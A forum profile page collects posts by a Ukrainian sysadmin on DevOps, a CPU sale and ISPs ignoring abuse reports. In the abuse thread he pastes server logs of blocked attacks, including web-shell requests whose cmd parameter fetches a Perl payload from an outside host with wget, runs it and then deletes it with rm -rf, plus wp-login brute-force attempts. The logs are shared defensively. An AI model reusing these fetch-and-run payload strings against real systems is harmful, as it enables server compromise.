black_13
МаглыТип контенту
Профили
Форум
Календарь
Все, що було написано black_13
-
не верю а аутсорсу. Много раз сталкивался - результат всегда один и тот же. На переговорах красавчеки, а в итоге делают недопроект который потом еще приходится допиливать своими силами кучу времени.
-
слушать тут нечего, нужно учить puppet/chef/ansible А потом надувать щоки и просить зп 3k$
-
devops != admin уровень знаний, инструменты, навыки и опыт нужен более высокого уровня. девопс это посути метаадминистрирование.
-
для того щоб це усвiдомити потрiбно включити голову. Не всi на це здатнi Дехто до комбайнiв не звик, лопатою любить працювати
-
devops никоим образом не является админом. Просто в нашей стране поголовных менеджеров спутались кони и люди ... огромная проблема с номенклатурой. Эволюционно devops это одна из более высоких профессиональных ступеней для ИТ администраторов. Наряду с управленческой (нач отдела, директор ИТ и тп) либо прогерством. В частности мне очень интересно наблюдать как из просоленных админов лепят девопсов и что из этого получается Крайне интересно ... Чего только стоит забрать у них ssh
-
на прошлой неделе 2 звонка с предложением в саппорт Linux/Unix второго уровня. ЗП предлагают до 20.000 Но мне это не инетересно, а интересно то что резюме не обновлялось уже 4 месяца. Неужто такой напряг с роботягами?
-
Продам пару процессоров Intel Xeon E5430 (s771)
тема ответил в black_13 пользователя black_13 в Торгівля. Серверне обладнання
в продаже пара процов! Напомню! -
Продам пару процессоров Intel Xeon E5430 (s771)
тема ответил в black_13 пользователя black_13 в Торгівля. Серверне обладнання
напомню! -
Продам пару процессоров Intel Xeon E5430 (s771)
тема ответил в black_13 пользователя black_13 в Торгівля. Серверне обладнання
у меня домашний комп мало используется. Но если 24/7 то это тоже важный фактор -
Продам пару процессоров Intel Xeon E5430 (s771)
тема ответил в black_13 пользователя black_13 в Торгівля. Серверне обладнання
up Сам юзаю такой CPU на материнке socket 775 - вполне достойно по производительности -
Проблемы с закрытием открытых http прокси по Украине
тема ответил в supportod пользователя black_13 в Обговорення провайдерів
Мне не очень нравится идея засерания интернета паразитным трафиком. Считаю что механизм наказания для ботов должен быть. И не вижу проблемы в информировании абонента провайдером в случай жалобы на него через абюз. хорошо, допустим пришла абуза, информировали абонента на почтовый ящик, которым он не пользуется (80% абонентов) что дальше? предположим наше письмо попало в 20% тех кто пользуется ящиком половина его прочтет на следующей неделе еще 5% его просто удалят не понимая что им с этим делать часть удалит случайно с горой спама что дальше? звонить? смс-ки слать? это я к тому, что это ничего не решает, 95% знают как слушать музыку в ВК и качать разное говно с этими же троянами, которые вас и брутфорсят Это уже вопрос к процедурам и регламентам. Не вижу смысла об этом фантазировать. Из личного опыта скажу, 1000 абонов ... и звонили, и писали, и ходили. Часто пользователи говорили "Спасибо!" -
Проблемы с закрытием открытых http прокси по Украине
тема ответил в supportod пользователя black_13 в Обговорення провайдерів
Если все будут относиться серьезно к безопасности, то не будет смысла существовать паразитному трафику. А боты - не люди, жалуйтесь в стенку, эффективнее будет. Ну принцип который вы описываете понятен. Он называется "Жри че дали!" Но мир уже на своей шкуре ощутил что это не совсем прогрессивная штука, а скорее регресивная. Посути все мы хорошо помним совок, который практиковал такой подход во всем Инструмент фидбека должен быть всегда и касательно крупных клиентов и касательно хомячков. Действия провайдера - это предмет дискуссии. Ну это мое ИМХО, конечно же ... -
Проблемы с закрытием открытых http прокси по Украине
тема ответил в supportod пользователя black_13 в Обговорення провайдерів
Мне не очень нравится идея засерания интернета паразитным трафиком. Считаю что механизм наказания для ботов должен быть. И не вижу проблемы в информировании абонента провайдером в случай жалобы на него через абюз. -
Проблемы с закрытием открытых http прокси по Украине
тема ответил в supportod пользователя black_13 в Обговорення провайдерів
Сути в ваших постах вообще нету. Вдруг раз и одним движением руки вы не знаете IP ботов, у вас есть IP рефлекторов, а это реальные рабочие днс серверы, например. Абюсу хоть папе римскому пишите, а проблема все равно ваша. Защита сайтов от ддоса - проблема решенная. И если для ваших WP бложиков такая угроза существенная, то стоит принять соответствующие меры. Но нужно понять, что виноваты только вы, что так относитесь к безопасности, а не кто-то далеко, о ком вы ничего не знаете. если это исключительно моя проблема, то как тогда обьяснить вполне таки реалные случаи с отдельными провайдерами которые всетаки читают абюсы и принимают меры? И зачем тогда вообще эти абюсы нужны? Если всем срать на них с большой горы, а клиенты для провайдеров ничто и звать их никак? -
Проблемы с закрытием открытых http прокси по Украине
тема ответил в supportod пользователя black_13 в Обговорення провайдерів
Как говорили в одном известном фильме "Одним движением руки ..." брутеры превращаются ... превращаются в флудеров Сути вопроса по абюсу это не меняет -
Проблемы с закрытием открытых http прокси по Украине
тема ответил в supportod пользователя black_13 в Обговорення провайдерів
еще раз повторяю, нет никакой связи между количеством клиентов и отношению к потенциально зараженным хостам, а также к отношению к абюсам. Больше абонов - больше команда саппорта - больше рук и возможностей бороться с ботами. Если есть желание - то проблем нет. Если желания нету - то пусть так работает Это понятно ... -
Проблемы с закрытием открытых http прокси по Украине
тема ответил в supportod пользователя black_13 в Обговорення провайдерів
Кстати сказать, если известная компания mirohost - они няшки, абюсы обрабатывают оперативно и эффективно. Опять же подтверждается то что на данный момент это не регламентировано законом, соответственно каждая компания сама решает забить или не забить. -
Проблемы с закрытием открытых http прокси по Украине
тема ответил в supportod пользователя black_13 в Обговорення провайдерів
Я работал в интернет провайдере, мы информировали и давали рекомендации. Иногда саппорт ходил и лечил, предоставляли единичную доп услугу по отдельной бумажке. Но на данный момент это инициатива на уровне конкретного провайдера. Государство у нас не регламентирует такие случаи, никак! И это печально. По поводу страшных цифр абонентов и тп, тут вы сильно утрируете, мы говорим не про общее количество абонов, а про зараженных - их всегда на пару порядков меньше. -
Проблемы с закрытием открытых http прокси по Украине
тема ответил в supportod пользователя black_13 в Обговорення провайдерів
О! Пошел конструктив ... это радует. Тогда сразу вопрос, если киевстар не отвечает за трафик, то за что он отвечает? Это можно было написать также как писал уже John_Doe - типа это твоя проблема и решай ее сам. Да я то и не против и как видите по логу сервера - вполне решаю. Вопрос к киевстару в другом, а конкретно: Почему игнорируются абюсы? Если они не видят в данной ситуации проблемы - пусть отписывают - "Это не наша проблема, освойте iptables/pf/ipfw и юзайте итд" Вопрос безопасноти меня парит не особо когда таких вот брутеров единицы, а вот были ситуации когда они "собирались в стаи" по сотне чел и тупо засерали канал. Тут кто виноват? Я? Вопрос к умнику тогда - какой магической командой фаервола на локалхосте розширить себе аплинк? -
Проблемы с закрытием открытых http прокси по Украине
тема ответил в supportod пользователя black_13 в Обговорення провайдерів
Ну хотябы обязать провайдеров обрабатывать abuse репорты в указанный срок. Формат сообщения можно регламентировать, вплоть до наличия дампа или других необходимых данных. Вот интересно, куда в киевстаре эти абусы идут? И идут ли кудато вообще? Когда писал им подобную срань, второй год жду ответ Хотя некоторые провайдеры реагируют. P.S. Я когдато тоже работал в саппорте мистечкового провайдера, мы за такими вещами следили, оповещали клиентов в случае чего. Многие были благодарны, поэтому меня удивляет что всеукраинские светила (аля киевстар) позволяют себе просто забивать на это дело. Печально -
Проблемы с закрытием открытых http прокси по Украине
тема ответил в supportod пользователя black_13 в Обговорення провайдерів
В данном вопросе вы не клиент,а равноправный участник интернет сообщества Кстати если начать банить всех и вся что кудато лезет,что-то брутфорсит,то через пару месяцев в интернете людей онлайн не останется.... Раньше банил DROP, TARPIT, blackhole Теперь стал просто резать полосу до 1B/s -
Проблемы с закрытием открытых http прокси по Украине
тема ответил в supportod пользователя black_13 в Обговорення провайдерів
Ну вашу позицию я уже понял - типа это проблемы админа, решай на уровне локалхоста Когда вам влетит в 3G девайс надцать гиг подобного трафика, возможно мнение поменяется Пока ок. Людина людинi вовк - это старый известный принцип Считай это бонус к опенсорс цмc. С ростом популярности сайта ты не будешь успевать отслеживать айпишки с которых идут запросы. Гугли как спрятать wp-login.php и вообще про безопастность Вордпреса. Админка WP-шки спрятана, как видите - ответ 403 "access forbidden" С самописами обычно еще хуже Мое ИМХО конечноже. Что касается CMS, не CMS и тп, данный пример просто как иллюстрация бездействия и наплевательства киевстара, конечно же есть масса других веселых записей в логах. Думаю что у каждого из вас вагон таких примеров, достаточно просто открыть error.log на веб сервере и полистать Вот еще веселые ребята, для тех кто любит побуквоедить по поводу wp-login.php [07/Jul/2015:02:43:21 +0300] - 91.191.144.110 - - "GET /images/jdownloads/screenshots/myluph.php?cmd=wget%20http://www.federacia.by/xmlrpc/includes/.../os.txt;perl%20os.txt;perl%20os.txt;perl%20os.txt;perl%20os.txt;perl%20os.txt;rm%20-rf%20os.* HTTP/1.1" 403 405 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "-"[07/Jul/2015:02:43:36 +0300] - 91.191.144.110 - - "GET /archives/images/jdownloads/screenshots/myluph.php?cmd=wget%20http://www.federacia.by/xmlrpc/includes/.../os.txt;perl%20os.txt;perl%20os.txt;perl%20os.txt;perl%20os.txt;perl%20os.txt;rm%20-rf%20os.* HTTP/1.1" 403 405 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "-" [07/Jul/2015:02:44:11 +0300] - 91.191.144.110 - - "GET /images/jdownloads/screenshots/.libs.up.php.j?cmd=wget%20http://www.federacia.by/xmlrpc/includes/.../os.txt;perl%20os.txt;perl%20os.txt;perl%20os.txt;perl%20os.txt;perl%20os.txt;rm%20-rf%20os.* HTTP/1.1" 403 405 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "-" [07/Jul/2015:02:44:26 +0300] - 91.191.144.110 - - "GET /archives/images/jdownloads/screenshots/.libs.up.php.j?cmd=wget%20http://www.federacia.by/xmlrpc/includes/.../os.txt;perl%20os.txt;perl%20os.txt;perl%20os.txt;perl%20os.txt;perl%20os.txt;rm%20-rf%20os.* HTTP/1.1" 403 405 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "-" На самом деле мне как админу плевать на таких какеров, но до определенного момента. А вот не до смеха становится, когда такого траффика становится много и с разных хостов. Тогда уж извините - на уровне локалхоста этой проблемы не решить Мне печально сознавать что в Украине нету законодательной базы и рабочих механизмов которая бы защищала мои интересы как клиента в данном вопросе -
Проблемы с закрытием открытых http прокси по Украине
тема ответил в supportod пользователя black_13 в Обговорення провайдерів
О, я смотрю тут много теоретиков собралось. А давайте ближе к практике! Вот живой актуальный пример, есть ip 178.137.163.42 с него сыпется мне на web сервак брутфорс вот такого вида: 2015/07/10 08:08:40 [error] 10037#0: *3012 access forbidden by rule, client: 178.137.163.42, server: my.blog.ua, request: "POST http://my.blog.ua/wp-login.php HTTP/1.1", host: "my.blog.ua" 2015/07/10 08:10:48 [error] 10037#0: *3016 access forbidden by rule, client: 178.137.163.42, server: my.blog.ua, request: "POST http://my.blog.ua/wp-login.php HTTP/1.1", host: "my.blog.ua" 2015/07/10 08:12:59 [error] 10037#0: *3032 access forbidden by rule, client: 178.137.163.42, server: my.blog.ua, request: "POST http://my.blog.ua/wp-login.php HTTP/1.1", host: "my.blog.ua" 2015/07/10 08:15:11 [error] 10037#0: *3038 access forbidden by rule, client: 178.137.163.42, server: my.blog.ua, request: "POST http://my.blog.ua/wp-login.php HTTP/1.1", host: "my.blog.ua" 2015/07/10 08:17:25 [error] 10037#0: *3040 access forbidden by rule, client: 178.137.163.42, server: my.blog.ua, request: "POST http://my.blog.ua/wp-login.php HTTP/1.1", host: "my.blog.ua" 2015/07/10 08:19:45 [error] 10037#0: *3054 access forbidden by rule, client: 178.137.163.42, server: my.blog.ua, request: "POST http://my.blog.ua/wp-login.php HTTP/1.1", host: "my.blog.ua" легко выяснил что провайдер этого уе*на (нехорошего человека) - киевстар Написал на абус .... вторые сутки реакции ноль целых ноль десятых. P.S. Не обращайте внимание на промежутки между запросами, чувак помещен в "карантин", а там сильно скорость зарезана ... на самом деле запросов по несколько в сек валится.
